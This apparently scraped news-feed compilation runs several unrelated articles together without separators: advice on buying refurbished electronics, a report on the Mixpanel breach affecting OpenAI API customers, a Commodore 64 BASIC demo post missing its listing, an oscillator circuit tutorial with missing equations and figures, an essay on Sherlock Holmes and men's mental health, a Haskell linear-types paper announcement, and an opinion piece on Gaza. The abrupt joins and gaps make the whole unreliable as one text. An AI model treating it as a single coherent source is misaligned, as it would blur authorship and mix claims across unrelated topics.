The process of buying refurbished electronics is often as good as buying new.
Photograph: dikushin/Getty Images
It’s important at this point to define terms. People sometimes use the phrases “preowned”, “secondhand” and “refurbished” interchangeably, which may have given the latter a bad rap.
“They really are quite, quite different,” says Katy Medlock, Back Market’s UK general manager. “Secondhand could be peer to peer: you’re not buying it with a warranty, it hasn’t been through a quality check, you’re not buying it with all the mod cons.”
That separates refurbished marketplaces such as
Back Market
,
MusicMagpie
,
Refurbed
and others from sites where you buy directly from a member of the public, such as Facebook Marketplace or Craigslist. “Our mission is all about trying to make the process of buying refurbished electronics as good as buying something new,” Medlock says, highlighting the ability Back Market offers to split payments, its 30-day money-back promise, 12-month warranty and next-day delivery as ways of seeking parity with retailers shipping new stock.
By contrast, buying preowned or secondhand on the private market is a gamble, even if you sidestep the risk of being scammed.
“I’ve heard so many horror stories from peer-to-peer when it comes to electronics,” says Windischhofer. “I love using those platforms for low-value products; I use a lot of Vinted for clothing, and it’s great. But for electronics, my advice would be to go through a professional where you get a warranty and an invoice, and where, in case this product breaks after five days, they have great customer service to really help you out.”
Items sold privately may also have unseen defects or botched repairs using cheap, third-party parts. “There’s a very different performance from the cheapest phone screen that can be put on a phone and the correct screen,” says Murdock. “Products get traded in at times with a $20 screen on an iPhone or Samsung [device] that really should have a wholesale cost of $150. They’re almost illegible.”
In other words, peer-to-peer buys are a gamble. If you insist on taking that risk, it’s best to buy in person and to take the opportunity to check both the screen and camera alongside signs of cosmetic wear and tear. If buying an iPhone or Android device, check the battery’s health in the phone’s settings and make sure it’s at least 80%.
If buying peer-to-peer on eBay, rather than through a certified refurbished seller, Williams encourages shoppers to look through the feedback and study photos and the product description. “Is this a reliable seller? Have they sold a lot of things in the past? What’s their feedback score? These are all things that are helpful to know that they’ve had good transactions with buyers in the past.”
Crunching the numbers
Buying refurbished tech can shrink your e-waste footprint.
Photograph: Pituk Loonhong/Getty Images
What does that ecological improvement look like in real terms? Let’s take smartphones – the bestselling refurbished category.
According to
research from Back Market
, buying a refurbished model rather than a new one will save 178g of e-waste and 77,000 litres of water, while preventing 77kg of carbon emissions and 244kg of raw materials from being mined.
Trojan Electronics, meanwhile,
estimates
that a refurbished smartphone uses 91.3% fewer raw materials and 86.4% less water while putting 91.6% less carbon emissions into the atmosphere compared with buying a new device.
Plenty of variables make the exact figures impossible to pin down. But while there’s still an impact from refurbished buys – especially if a new battery or screen is installed as part of the refurbishing process – there’s no denying that the harm is lessened.
“Every time you buy a smartphone, it’s about a 58kg CO
2
offset if you don’t buy a new one [and instead] buy one that’s been refurbished,” says James Murdock, co-founder of
Alchemy
, a company that refurbishes old technology for resale. “That includes the operation to actually refurbish it, and the existence of our business. It’s even more if you’re buying a laptop.”
It’s not just phones, either. “Now, people are turning to all different types of electronics, everything from refurbished air fryers through to hair accessories from TVs, coffee machines, ice-cream makers and games consoles,” says Eve Williams, general manager at eBay UK. Unlike its traditional peer-to-peer sales business, eBay has a method by which it
certifies refurbished-reselling businesses
.
“There’s nothing to lose [from buying refurbished],” she says, pointing out that if you get the same 12-month guarantee as you would if buying new, you’re getting the same product at a cheaper price. “You’re getting something that otherwise would have ended up in landfill. We have this amazing seller called
Preloved Tech
. Matt and Andrea, who run it, started their business by working in schools, going in and seeing the times that schools were throwing out laptops and iPads because they didn’t know what to do with them. There are no rules around what some businesses should do to get rid of or recycle technology.
“They’re taking a lot of that tech and are able to give money and funding back to the schools, while also then being able to refurbish these items to sell on, and extend the life of them.”
Avoid smartphones that have stopped receiving security updates.
Photograph: Tim Robberts/Getty Images
“The best advice I can give for buying refurbished is to go via established retailers such as
Back Market
,
Giffgaff
and
Vodafone
, and if you’re buying through eBay then try to get a device that’s listed as ‘certified refurbished’,” says technology journalist Thomas Deehan. “You can also find different perks available depending on where you buy. For instance, Giffgaff provides a two-year warranty on ‘like new’ phones, while Back Market often gives you the option to have an entirely new battery fitted into your device of choice.”
In general, the more information a retailer provides about their refurbishing process, the better. “A proper refurbisher will tell you exactly what’s been checked, what’s been replaced, and how the product is graded,” says Rigg. “If you see vague descriptions like ‘used’ or ‘open box’ with no explanation, that’s your cue to walk away.”
Jon Miller, chief commercial officer at MusicMagpie, agrees. “As a rule of thumb, it’s far wiser to be careful when buying refurbished tech. Try to check the warranty length and what exactly that covers. Similarly, check the fine print and ensure ‘refurbished’ means the tech has been properly restored and tested, not just used.”
Is there any preowned technology you should avoid? “If you had asked me that question 10 years ago, I would have said: ‘Yes, because technology is so fast and, you know, the new iPhone is so much better than the last one,’” says Windischhofer. “But now? I don’t think there’s any product that I would buy new. I would always buy the generation before that.”
Alchemy, similarly, practices what it preaches. “We’ve got hundreds of MacBooks, iPhones and other products in the company. We have about 350 employees, and no one, including me, has ever had a new one,” says Murdock.
There are limits, however, to how old a device you should get, and it varies by category. A
PlayStation 4
will continue to play all disc-based games made for it indefinitely, but something internet-reliant may end up losing functionality with time. Older OLED TVs, too, are considered more prone to burn-in than their modern counterparts.
Equally, buying a five-year-old refurbished phone will be cheaper than buying last year’s model, but if you end up needing to replace it sooner – for example, if it’s an Android that’s stopped receiving security updates – then it’s a false economy.
“It might be tempting to get an old MacBook Air from 2015, but it won’t receive regular updates like M-series MacBooks will,” says Deehan. “I think there’s a good balance to strike where you sometimes buy things new and other times go down the refurbished route. It’s about saving money where it makes sense so that you have the freedom to spend a bit more on a device that you’ll make the most of.”
Finally, don’t forget the age-old adage of “buy cheap, buy twice”. Or, as Rigg puts it: “A gadget that fails quickly and can’t be repaired is only cheap for about five minutes.”
“Don’t be tempted by the cheapest offshore, interesting-looking eBay seller that looks like it’s been there for five minutes,” says Murdock. “Buy from a legitimate-looking local partner that’s offering a warranty, as they would with any other kind of new product, and is willing to stand behind that.”
If you plan to resell your old devices, giving them a good clean will make them look their best.
Photograph: MDV Edwards/Getty Images
So you’ve bought a refurbished phone, laptop or tablet and now have one that’s surplus to requirements. What should you do?
Recycling is an option, but one that should be considered a last resort, according to Medlock, especially as there are limits on capacity. “With the amount of new electronics that are produced every year … there’s no way that … the amount sold in the UK could ever be recycled.”
Many sites will offer a trade-in when you buy the replacement, which will increase the likelihood of a device getting a second lease of life in the refurbished ecosystem.
Alternatively, you could take it to
CeX
or try your luck on the peer-to-peer market through
Gumtree
,
Facebook Marketplace
,
Craigslist
or
eBay
. If you go down this route, do be sure to wipe all your personal data first and give it a good spruce-up.
“This should go without saying, but prior to being listed or sold, your tech should be given a good clean to make it look the best that it can,” says Deehan. “Some retailers will dock the value of your device based on its cosmetic appearance, so make sure to do your part in keeping it all lint- and fingerprint-free.”
Donating is also an option. I recently donated an old laptop to
Screen Share
, which repurposes computers and phones for refugees to help tackle digital exclusion, and a quick search online will uncover many other worthwhile places to donate.
Whatever you choose, Medlock suggests putting some thought into the end of life for today’s Black Friday tech buys. “If people are upgrading, the pathway is obviously to buy refurbished … and encouraging people at that point to buy better.
“There is a cost saving there, so people can use that saving to buy devices that last longer, are built to last and built to be repaired.”
Alan Martin
has more than a decade’s experience of writing about and reviewing consumer technology. He once had to strip off to retrieve a battery-depleted drone from a freezing cold
south London lake, showing his deranged devotion to the career. Nearby swans were left confused
OpenAI discloses API customer data breach via Mixpanel vendor hack
Bleeping Computer
www.bleepingcomputer.com
2025-11-27 11:27:06
OpenAI is notifying some ChatGPT API customers that limited identifying information was exposed following a breach at its third-party analytics provider Mixpanel. [...]...
OpenAI is notifying some ChatGPT API customers that limited identifying information was exposed following a breach at its third-party analytics provider Mixpanel.
Mixpanel offers event analytics that OpenAI uses to track user interactions on the frontend interface for the API product.
According to the AI company, the cyber incident affected “limited analytics data related to some users of the API” and did not impact users of ChatGPT or other products.
“This was not a breach of OpenAI’s systems. No chat, API requests, API usage data, passwords, credentials, API keys, payment details, or government IDs were compromised or exposed,”
OpenAI says
in a press release.
Mixpanel
reported
that the attack “impacted a limited number of our customers” and resulted from a smishing (SMS phishing) campaign that the company detected on November 8.
OpenAI received details of the affected dataset on November 25 after being informed of Mixpanel’s ongoing investigation.
The AI company notes that the exposed information may include:
Name that was provided to us on the API account
Email address associated with the API account
Approximate coarse location based on API user browser (city, state, country)
Operating system and browser used to access the API account
Referring websites
Organization or User IDs associated with the API account
Because no sensitive credentials were exposed, users do not need to reset passwords or regenerate API keys.
Some users are
reporting
that CoinTracker, a cryptocurrency portfolio tracker and tax platform, has also been impacted, with exposed data also including device metadata and limited transaction count.
OpenAI has started an investigation to determine the full scope of the incident. As a precaution, it has removed Mixpanel from its production services and is notifying organizations, administrators, and individual users directly.
While OpenAI underlines that only users of its API are impacted, it notified all its subscribers.
The company warns that the leaked data could be leveraged in phishing or social-engineering attacks and advises users to watch for credible-looking malicious messages related to the incident.
Messages containing links or attachments should be verified to ensure they originate from an official OpenAI domain.
The company also urges users to enable 2FA and never send sensitive information, including passwords, API keys, or verification codes, through email, text, or chat.
Mixpanel’s CEO, Jen Taylor, said that all impacted customers have been contacted directly. “If you have not heard from us, you were not impacted,” she noted.
In response to the attack, Mixpanel secured affected accounts, revoked active sessions and sign-ins, rotated compromised credentials, blocked the threat actor’s IP addresses, and reset passwords for all employees. The company has also implemented new controls to prevent similar incidents in the future.
It's budget season! Over 300 CISOs and security leaders have shared how they're planning, spending, and prioritizing for the year ahead. This report compiles their insights, allowing readers to benchmark strategies, identify emerging trends, and compare their priorities as they head into 2026.
Learn how top leaders are turning investment into measurable impact.
After a long search I've finally figured out how to embed Commodore 64 BASIC listings into blog posts.
This isn't a game, just a visual demo showing off some of the C64's capabilities. It's taken from two one-line programs in the 1985 Special Issue of Run magazine, posted by L.F.S. and Glenn Zuch. I've combined them.
Okay, a few notes here. First off, the Commodore 64 keyboard had special keys for setting and changing color. These are hard to convey in printed listings, so the convention is to use {} brackets and indicate what keys should be pressed.
{yellow}
is a special character on the 8 key accessed by hitting control+8; this turns the following output yellow.
{up}{down}{left}
and
{right}
are the cursor keys. You get them by hitting those keys. They move the on-screen cursor, changing where the next character will print.
{reverse on}
is control+9, and that basically reverses the color of the next printed character; a space will be a full color "block", etc.
Peek and Poke show up as commands in a few different 8-bit BASICs... what they do is let you look at (peek) or change (poke) memory addresses directly. This is different for every computer model, of course, and it isn't obvious what exactly they do without a memory reference chart.
Poke 53280
lets us directly change the color of the "frame" around our graphics window, and
53281
lets us change the color of the background itself.
The
? mid$
line chooses one of the cursor direction codes we have at random, making the asterisk appear to burrow in a random direction each update.
So, a simple program that crams a lot into two lines. The original was line 2; I adapted line 1 (changing the colors) from another one-liner to make the colors pop a bit more.
There’s an old electronics joke that if you want to build an oscillator, you should try building an amplifier. One of the fundamental criteria for oscillation is the presence of signal gain; without it, any oscillation is bound to decay, just like a swing that’s no longer being pushed must eventually come to a stop.
In reality, circuits with gain can occasionally oscillate by accident, but it’s rather difficult to build a good analog oscillator from scratch. The most common category of oscillators you can find on the internet are circuits that don’t work reliably. This is followed by approaches that require exotic components, such as center-tapped inductors or incandescent lightbulbs. The final group are the layouts you can copy, but probably won’t be able to explain to a friend who doesn’t have an EE degree.
In today’s article, I wanted to approach the problem in a different way. I’ll assume that you’re up-to-date on some of the key lessons from earlier articles: that you
can tell the difference between voltage and current
, have a
basic grasp of transistors
, and know what happens when a
capacitor is charged through a resistor
. With this in mind, let’s try to construct an oscillator that’s easy to understand, runs well, and has a predictable operating frequency. Further, let’s do it without peeking at someone else’s homework.
The simplest form of an oscillator is a device that uses negative feedback to cycle back and forth between two unstable states. To illustrate, think of a machine equipped with a light sensor and a robotic arm. In the dark, the machine is compelled to stroll over to the wall switch and flip it on. If it detects light, another part of its programming takes over and toggles the switch off. The machine is doomed to an endless cycle of switch-flipping at a frequency dictated by how quickly it can process information and react.
At first blush, we should be able to replicate this operating principle with a single n-channel MOSFET. After all, a transistor can be used as an electronically-operated switch:
A wannabe oscillator.
The transistor turns on when the voltage between its gate terminal and the source leg (
Vgs
) exceeds a certain threshold, usually around 2 V. When the power supply first ramps up, the transistor is not conducting. With no current flowing through, there’s no voltage drop across the resistor, so
Vgs
is pulled toward the positive supply rail. Once this voltage crosses about 2 V, the transistor begins to admit current. It stands to reason that the process shorts the bottom terminal of the resistor to the ground and causes
Vgs
will plunge to 0 V. If so, that would restart the cycle and produce a square wave on the output leg.
In practice, this is not the behavior you’ll see. For a MOSFET, the relationship between
Vgs
and the admitted current (
Id
) is steep, but the device is not a binary switch:
BS170 Vgs-Id curve for Vds = 1 V. Captured by author.
In particular, there is a certain point on that curve, somewhere in the vicinity of 2 V, that corresponds to the transistor only admitting a current of about 300 µA. From Ohm’s law, this current flowing through a 10 kΩ resistor will produce a voltage drop of 3 V. In a 5 V circuit, this puts
Vgs
at 5 V - 3 V = 2 V. In other words, there exists a stable equilibrium that prevents oscillation. It’s akin to our robot-operated light switch being half-on.
To fix this issue, we need to build an electronic switch that has no stable midpoint. This is known as
Schmitt trigger
and its simple implementation is shown below:
A discrete-transistor Schmitt trigger.
To analyze the design, let’s assume the circuit is running off
Vsupply = 5
V. If the input signal is 0 V, the transistor on the left is not conducting, which pulls
Vgs
for the other MOSFET all the way to 5 V. That input allows nearly arbitrary currents to flow through the right branch of the circuit, making that current path more or less equivalent to a two-resistor a voltage divider. We can calculate the midpoint voltage of the divider:
This voltage is also propagated the source terminal of the input transistor on the left. The actual
Vth
for the
BS170
transistors in my possession is about 2.15 V, so for the input-side transistor to turn on, the supplied signal will need to exceed
Vs + Vth ≈
2.6 V in reference to the ground. When that happens, a large voltage drop appears across R1, reducing the
Vgs
of the output-side transistor below the threshold of conduction, and choking off the current in the right branch.
At this point, there’s still current flowing through the common resistor on the bottom, but it’s now increasingly sourced via the left branch. The left branch forms a new voltage divider; because R1
has a higher resistance than R2,
Vs
is gradually reduced, effectively bumping up
Vgs
for the left transistor and thus knocking it more firmly into conduction even if the input voltage remains constant. This is a positive feedback that gives the circuit no option to linger in a half-on state.
Once the transition is complete, the voltage drop across the bottom resistor is down from 450 mV to about 50 mV. This means that although the left transistor first turned on when the input signal crossed 2.6 V in reference to the ground, it will not turn off until the voltage drops all the way to 2.2 V — a 400 mV gap.
This circuit lets us build what’s known as a
relaxation oscillator
. To do so, we only need to make two small tweaks. First, we need to loop an inverted output signal back onto the input; the most intuitive way of doing this is to add another transistor in a switch-like configuration similar to the failed design of a single-transistor oscillator mentioned earlier on. This building block, marked on the left, outputs
Vsupply
when the signal routed to the gate terminal is 0 V, and produces roughly 0 V when the input is near
Vsupply
:
A Schmitt trigger oscillator.
Next, to set a sensible oscillation speed, we need to add a time delay, which can be accomplished by charging a capacitor through a resistor (middle section). The resistor needs to be large enough not to overload the inverter stage.
For the component values shown in the schematic, the circuit should oscillate at a frequency of almost exactly 3 kHz when supplied with 5 V:
An oscilloscope trace for the circuit, by author.
The frequency is governed by how long it takes for the capacitor to move
Δv =
400 mV between the two Schmitt thresholds voltages:
the “off” point at 2.2 V and the “on” point at 2.6 V.
Because the overall variation in capacitor voltage is small, the we can squint our eyes and say that the voltage across the 100 kΩ resistor is nearly constant in every charge cycle. When the resistor is connected to the positive rail,
V
R
≈ 5 V – 2.4 V ≈ 2.6 V. Conversely, when the resistor is connected to the ground, we get
V
R
≈ 2.4 V. If the voltages across the resistor are nearly constant, so are the resulting capacitor currents:
From the
fundamental capacitor equation
(
Δv = I · t/C
), we can solve for the charging time needed to move the voltage by
Δv
= 400 mV; the result is about 154 µs for the charging period and 167 µs for the discharging period. The sum is 321 µs, corresponding to a frequency of about 3.1 kHz – pretty close to real life.
The circuit can be simplified to two transistors at the expense of readability, but if you need an analog oscillator with a lower component count, an
operational amplifier
is your best bet.
If you’re rusty on op-amps, I suggest pausing to review the article linked in the preceding paragraph. That said, to understand the next circuit, all you need to know is that an op-amp compares two input voltages and that
Vout
swings toward the positive rail if
Vin+
≫
Vin-
or toward the negative rail if
Vin+
≪
Vin-
.
An op-amp relaxation oscillator.
For simplicity, let’s choose R1 = R2 = R3 and then look at the non-inverting (
Vin+
) input of the chip. What we have here is a three-way voltage divider: the signal on the non-inverting input is simple average of three voltages:
Vsupply
(5 V), ground (0 V), and
Vout
. We don’t know the value of
Vout
just yet, but it can only vary from 0 V to
Vsupply
, so the
V
in+
signal will always stay between ⅓ ·
Vsupply
and ⅔ ·
Vsupply.
Next, let’s have a look at the inverting input (
Vin-
). When the circuit is first powered on, the capacitor C isn’t charged, so
Vin-
sits at 0 V. Since the voltage on the non-inverting input can’t be lower than ⅓ ·
Vsupply
, this means that on power-on,
Vin+
≫
Vin-
, sending the output voltage toward the positive rail. When
Vout
shoots up, it also bumps the
Vin+
average to ⅔ ·
Vsupply.
Because
Vout
is now high, this starts the process of charging the capacitor through the bottom resistor (R
cap
). After a while, the capacitor voltage is bound to exceed ⅔ ·
Vsupply
. The capacitor voltage is also hooked up to the amplifier’s inverting input, and at that point,
Vin-
begins to exceeds
Vin+
, nudging the output voltage lower. Stable equilibrium is not possible because this output voltage drop is immediately reflected in the three-way average present on the
Vin+
leg, pulling it down and causing the difference between
Vin-
and
Vin+
to widen. This positive feedback loop puts the amplifier firmly into the
Vin+
≪
Vin-
territory.
At that point,
Vout
must drop to 0 V, thus lowering the voltage on the non-inverting leg to ⅓ ·
Vsupply
. With
Vout
low, the capacitor starts discharging through R
cap
, but it needs to travel from the current charge state of ⅔ ·
Vsupply
all the way to ⅓ ·
Vsupply
before
Vin-
becomes lower than
Vin+
and the cycle is allowed to restart.
The continued charging and discharging of the capacitor between ⅓ ·
Vsupply
and ⅔ ·
Vsupply
results in periodic oscillation. The circuit produces a square wave signal with a period dictated by the value of C and R
cap
. The frequency of these oscillations can be approximated analogously to what we’ve done for the discrete-transistor variant earlier on. In a 5 V circuit with R1 = R2 = R3, the capacitor charges and discharges by
Δv ≈
1.67 V. If R
cap
= 10 kΩ, then the quasi-constant capacitor charging current is
I
≈
2.5 V / 10 kΩ
≈
250 µA.
Knowing
Δv
and
I
, and assuming C = 1 µF, we can tap into the capacitor equation (
Δv = I · t/C
) to solve for
t
. The result is 6.67 ms. This puts the charge-discharge roundtrip at 13.34 ms, suggesting a frequency of 75 Hz. The actual measurement is shown below:
Oscilloscope trace for the relaxation oscillator. By author.
The observed frequency is about 7% lower than predicted: 70 instead of 75 Hz. Although I could pin this on component tolerances, a more honest explanation is that at
Δv ≈
1.67 V, the constant-current approximation of the capacitor charging process is stretched thin; the segments in the bottom oscilloscope trace diverge quite a bit from a straight line.
Short of reducing R3 to bring down
Δv
and thus reduce the variations in current, the way to develop a better formula is to tap into the equation for a capacitor charged by a constant voltage via a resistor, as derived
here
:
\(V_{cap} = V_{in} \cdot (1 - e^{-t \over RC})\)
To make the math simple, we can use ⅓ ·
Vsupply
as the reference point for the calculation. In this view, the “virtual” supply voltage is
Vin =
⅔ ·
Vsupply
(because we took away the unused bottom ⅓) and the capacitor is charging from 0 V to
Vcap
=
50%
·
Vin (
i.e., ⅓
of ⅔
).
To find the charging time, we just need to rearrange the R-C formula for the
Vcap/Vin
ratio, and then solve for
t
at which the value works out to 50% (0.5):
If we plug 1 µF and 10 kΩ into the equation, the value works out to 72 Hz, which is within 3% of the observed behavior, comfortably within the tolerances of standard passive components.
The method outlined earlier on is not the only conceptual approach to build oscillators. Another way is to produce resonance. We can do this by taking a standard op-amp voltage follower which uses negative feedback to control the output — and then mess with the feedback loop in a particular way.
An op-amp voltage follower.
In the basic voltage follower configuration, the op-amp reaches a stable equilibrium when
Vin+
≈
Vin-
≈
Vout
. Again, the circuit works only because of the negative feedback loop; in its absence,
Vin-
would diverge from
Vin+
and the output voltage would swing toward one of the supply rails.
To turn this circuit into an oscillator, we can build a feedback loop that normally provides negative feedback, but that inverts the waveform at a particular sine-wave frequency. This turns negative feedback into positive feedback; instead of stabilizing the output voltage, it produces increasing swings, but only at the frequency at which the inversion takes place.
Such a selective waveform inversion sounds complicated, but we can achieve it a familiar building block: an R-C lowpass filter. The mechanics of these filters are discussed in
this article
; in a nutshell, the arrangement produces a frequency-dependent phase shift of 0° (at DC) to -90° (as the frequency approaches infinity). If we cascade a couple of these R-C stages, we can achieve a -180° phase shift at some chosen frequency, which is the same as flipping the waveform.
A minimalistic but well-behaved op-amp solution is shown below:
A rudimentary phase-shift oscillator.
In this particular circuit, an overall -180° shift happens when each of the R-C stages adds its own -60°. It’s easy to find the frequency at which this occurs. In the aforementioned article on signal filtering, we came up with the following formula describing the shift associated with the filter:
\(\theta = -arctan( 2 \pi f R C )\)
Arctangent is the inverse of the tangent function. In a right triangle, the tangent function describes the ratio of lengths of the opposite to the adjacent for a particular angle; the arctangent goes the other way round, giving us an angle for a particular ratio. In other words, if
x
=
tan(α)
then
α
=
arctan(x).
This allows us to rewrite the equation as:
\(2 \pi f R C = -tan(\theta)\)
We’re trying to solve for
f
at which
θ
= -60°; the value of
-tan(-60°)
is roughly 1.73, so we can plug that into the equation and then move everything except
f
to the right. Throwing in the component values for the first R-C stage in the schematic, we obtain:
You’ll notice that the result is the same for the other two stages: they have higher resistances but proportionally lower capacitances, so the denominator of the fraction doesn’t change.
Oscilloscope traces for the circuit are shown below:
Traces for the three R-C stages.
Because the amplifier’s gain isn’t constrained in any way, the output waveform is a square wave. Nevertheless, in a lowpass circuit with these characteristics, the resulting waveforms are close enough to sinusoids that the sine-wave model approximates the behavior nearly perfectly. We can run a discrete-time simulation to show that the sine-wave behavior of these three R-C stages (gray) aligns pretty well with the square-wave case (blue):
A simulation of a square & sine wave passing through three R-C filters.
To make the output a sine wave, it’s possible to tinker with with the feedback loop to lower the circuit’s gain, but it’s hard to get it right; insufficient gain prevents oscillation while excess gain produces distortion. A simpler trick is to tap into the signal on the non-inverting leg (bottom oscilloscope trace) and use the other part of a dual op-amp IC to amplify this signal to your heart’s desire.
Some readers might be wondering why I designed the stages so that each of them has an impedance ten times larger than the stage before it. This is to prevent the filters from appreciably loading each other. If all the impedances were in the same ballpark, the middle filter could source currents from the left as easily as it could from the right. In that situation, finding the point of -180° phase shift with decent accuracy would require calculating the transfer function for the entire six-component Franken-filter; the task is doable but — to use a mathematical term —
rather unpleasant
.
Footnote: in the literature, the circuit is more often constructed using highpass stages and a discrete transistor as an amplifier. I’d wager that most authors who present the discrete-transistor solution have not actually tried it in practice; otherwise, they would have found it to be quite finicky. The version presented in this article is discussed
here
.
If you enjoyed the content, please subscribe. I’m not selling anything; it’s just a good way to stay in touch with the writers you like.
Discussion about this post
How Arthur Conan Doyle Explored Men's Mental Health Through Sherlock Holmes
Note:
This article is republished from
The Conversation
under a Creative Commons license. It includes links to external sites that may earn a commission for purchases. We did not add these links and have kept the original content intact.
Arthur Conan Doyle was not just one of the world’s best crime fiction writers. He was a progressive wordsmith who brought light to controversial and taboo subjects. One of those taboo subjects was male vulnerability and mental health problems – a topic of personal significance to the author.
Doyle was a
vulnerable child
. His father, Charles,
was an alcoholic
, which led to financial troubles in the family. Charles was admitted to an asylum in 1881 and spent the next 12 years in various
mental care establishments
. So began Doyle’s interest in male vulnerability and mental health.
The character of Sherlock Holmes is a true expression of male vulnerability that does not equate it with weakness. Doyle does not represent Holmes as infallible, but as a man others can relate to – he battles with drug addiction, loneliness and depression. His genius thrives in part because of these vulnerabilities, not despite them.
In The Man with the Twisted Lip, for example, a man named Neville St Clair hides his double life. He tells his family that he is a respectable entrepreneur going to London on business. In reality he is begging on the city streets. He lives this double life due to fear and shame over the inability to pay off his debts. “It was a long fight between my pride and the money,” he explains, “but the dollars won at last.”
“I would have endured imprisonment, ay, even execution, rather than have left my miserable secret as a family blot to my children,” St Clair says. In having his character consider execution to protect his and his family’s reputation, Doyle explored the societal expectations of Victorian masculinity and how men struggled with such pressures.
The Stockbroker’s Clerk also examines male suicide, as well as economic and professional anxieties. When Holmes reveals the crimes of Harry Pinner, the man attempts suicide rather than face prison.
In The Engineer’s Thumb, hydraulic engineer Victor is treated physically by Watson and mentally by Holmes. As Doyle writes: “Round one of his hands he had a handkerchief wrapped, which was mottled all over with bloodstains. He was young, not more than five-and-twenty, I should say, with a strong masculine face; but he was exceedingly pale and gave me the impression of a man who was suffering from some strong agitation, which it took all his strength of mind to control.”
The physical injury marks Victor as a victim of physical violence. Watson suggests that Victor is using all his mental capabilities to keep calm about his severe pain. Holmes treats Victor’s mind as he listens to his story: “Pray lie down there and make yourself absolutely at home. Tell us what you can, but stop when you are tired, and keep up your strength with a little stimulant.”
Holmes is a protector, a confidante and a comforter in this scene. He provides Victor with breakfast, induces him to lie down and offers him a stimulant (more than likely brandy).
The extremity of violence that Victor has endured has escalated to mental trauma. In having Holmes treat Victor’s mental trauma while Watson treats his physical pain, Doyle showed the importance psychological support for men of the age.
Holmes was a highly popular character. To contemporary readers, his drug use and dysfunctional clients were seen as markers of his genius rather than a reflection of the significant social issues that men faced during this period. But today, they offer a window into the mental struggles of Victorian men, and a point of connection between readers of the past and present.
Looking for something good? Cut through the noise with a carefully curated selection of the latest releases, live events and exhibitions, straight to your inbox every fortnight, on Fridays.
Sign up here
.
This article features references to books that have been included for editorial reasons, and may contain links to
bookshop.org
. If you click on one of the links and go on to buy something from
bookshop.org
The Conversation UK may earn a commission.
I’m very proud to announce that “Lazy Linearity for a Core Functional
Language”, a paper by myself and
Bernardo
Toninho
, will be published
at
POPL 26
!
The extended version of the paper, which includes all proofs, is available
here [
arXiv
,
PDF
].
The short-ish story
: In 2023, for my Master’s thesis, I reached out to
Arnaud
Spiwack
to discuss how Linear Types had
been implemented in GHC. I wanted to research compiler optimisations made
possible by linearity. Arnaud was quick to tell me:
“
Well yes, but you can’t!“
“Even though Haskell is linearly typed, Core isn’t!”
1
Linearity is ignored in Core because, as soon as it’s optimised,
previously valid linear programs become invalid.
It turns out that traditional linear type systems are too syntactic, or
strict
, about understanding linearity – but Haskell, regardless of linear
types, is lazily evaluated.
Our paper presents a system which, in contrast, also accepts programs that can
only be understood as linear under non-strict evaluation. Including the vast
majority of optimised linear Core programs (with proofs!).
The key ideas of this paper were developed during my Master’s, but it took a
few more years of on-and-off work (supported by my employer
Well-Typed
) with Bernardo to crystalize the understanding of a
“lazy linearity” and strengthen the theoretical results.
Now, the proof of the pudding is in the eating. Go read it!
Abstract
Traditionally, in linearly typed languages, consuming a linear resource is
synonymous with its syntactic occurrence in the program. However, under the
lens of non-strict evaluation, linearity can be further understood
semantically, where a syntactic occurrence of a resource does not necessarily
entail using that resource when the program is executed. While this distinction
has been largely unexplored, it turns out to be inescapable in Haskell’s
optimising compiler, which heavily rewrites the source program in ways that
break syntactic linearity but preserve the program’s semantics. We introduce
Linear Core, a novel system which accepts the lazy semantics of linearity
statically and is suitable for lazy languages such as the Core intermediate
language of the Glasgow Haskell Compiler. We prove that Linear Core is sound,
guaranteeing linear resource usage, and that multiple optimising
transformations preserve linearity in Linear Core while failing to do so in
Core. We have implemented Linear Core as a compiler plugin to validate the
system against linearity-heavy libraries, including linear-base.
Core is the
intermediate compiler language to which source Haskell is desugared and to
which optimisations are applied
↩︎
Keep Talking About Gaza at Your Thanksgiving Table
Intercept
theintercept.com
2025-11-27 09:00:00
The so-called ceasefire might seem like a good excuse to bury the hatchet and enjoy a quieter family dinner, but it’s not.
The post Keep Talking About Gaza at Your Thanksgiving Table appeared first on The Intercept....
Relatives of Palestinians who lost their lives in Israeli attacks that violated the ceasefire in the Gaza Strip mourn at the Aqsa Martyrs Hospital in Deir al-Balah, Gaza, on Nov. 23, 2025.
Photo: Abdalhkem Abu Riash/Anadolu via Getty Images
If Israel’s genocide
in Gaza has been a site of tension in your family for the last two Thanksgiving holidays, this year should be no different. The so-called ceasefire might seem like a good excuse to bury the hatchet and enjoy a quieter turkey dinner, but when we look at the harrowing status quo for Palestinians in Gaza today, there is no peace to be thankful for — especially not on a day that marks the remembrance of this country’s own
genocide against Indigenous Americans
.
To be clear, if two years of livestreamed annihilation have failed to shift your loved ones’ support away from the Israeli ethnostate, I doubt there is anything a dinner table argument could do to persuade them. There can be no reasoning with a
worldview
that forecloses seeing Palestinians as fully human.
I navigate this with pro-Israel members of my own British Jewish family. It’s painful, and I don’t have any good advice. Whatever your approach with your family, there can be no pretense that the genocide in Gaza is over.
I’ll be thinking of another family this Thanksgiving: that of my student from Gaza.
Families like mine, divided over Israel, are not the important ones here. For my part, I’ll be thinking instead of another family this Thanksgiving: that of my student from Gaza. He escaped in 2024 after Israel bombed his home, killing two of his immediate family members, including his mother. His surviving family are still there, living in tents. He hasn’t heard from them in over two weeks.
It is for families like my student’s that we cannot simply take it easy this Thanksgiving because of the so-called ceasefire in Gaza.
Unending Destruction
While the October 10 agreement has offered some relief for Palestinians, with a significant drop in daily slaughter, displacement, starvation and killings by Israeli forces continue.
Instead
of relentless, Israel’s bombings over the last 45 days have been simply ongoing and regular. Israel has
killed
345 Palestinians in Gaza, including 120 children, while demolishing over 1,500 structures.
At the same time, only a fraction of the aid trucks which were supposed to enter Gaza daily under the ceasefire agreement have been permitted entry by Israeli forces. Mass, enforced hunger continues in the Strip, where 50 million tons of
rubble
sits atop well over 10,000 unrecovered bodies.
In the face of such totalizing and unending destruction, it’s hard to find much solace in the fact that the support for the Palestinian cause has
grown
internationally; that nearly all major international human rights organizations have
recognized
Israel’s actions as
genocidal
; that a major
wave
of nation-states, including France, Canada, and Britain, moved this year to
recognize the state of Palestine
. The dead, displaced, and occupied can do little with declarations that carry no concrete consequences.
“What we need is a justice plan,” Mosab Abu Toha, the Palestinian writer and poet,
told
a U.N. meeting this week. “It is time to stop accepting the illusion of peace processes that only entrench injustices.”
With the state of the world as it stands, it feels unlikely that Israeli leaders will be held
accountable for their war crimes
any time soon. Justice for Palestine is hard to imagine, but we can continue to apply pressure in ways that have already seen paradigms shift. Zohran Mamdani’s victory in the New York City mayoral election was a
genuine victory
against the perverse weaponization of antisemitism against Israel’s critics. Now New Yorkers must push our next mayor to uphold commitments to Palestinian solidarity and international law.
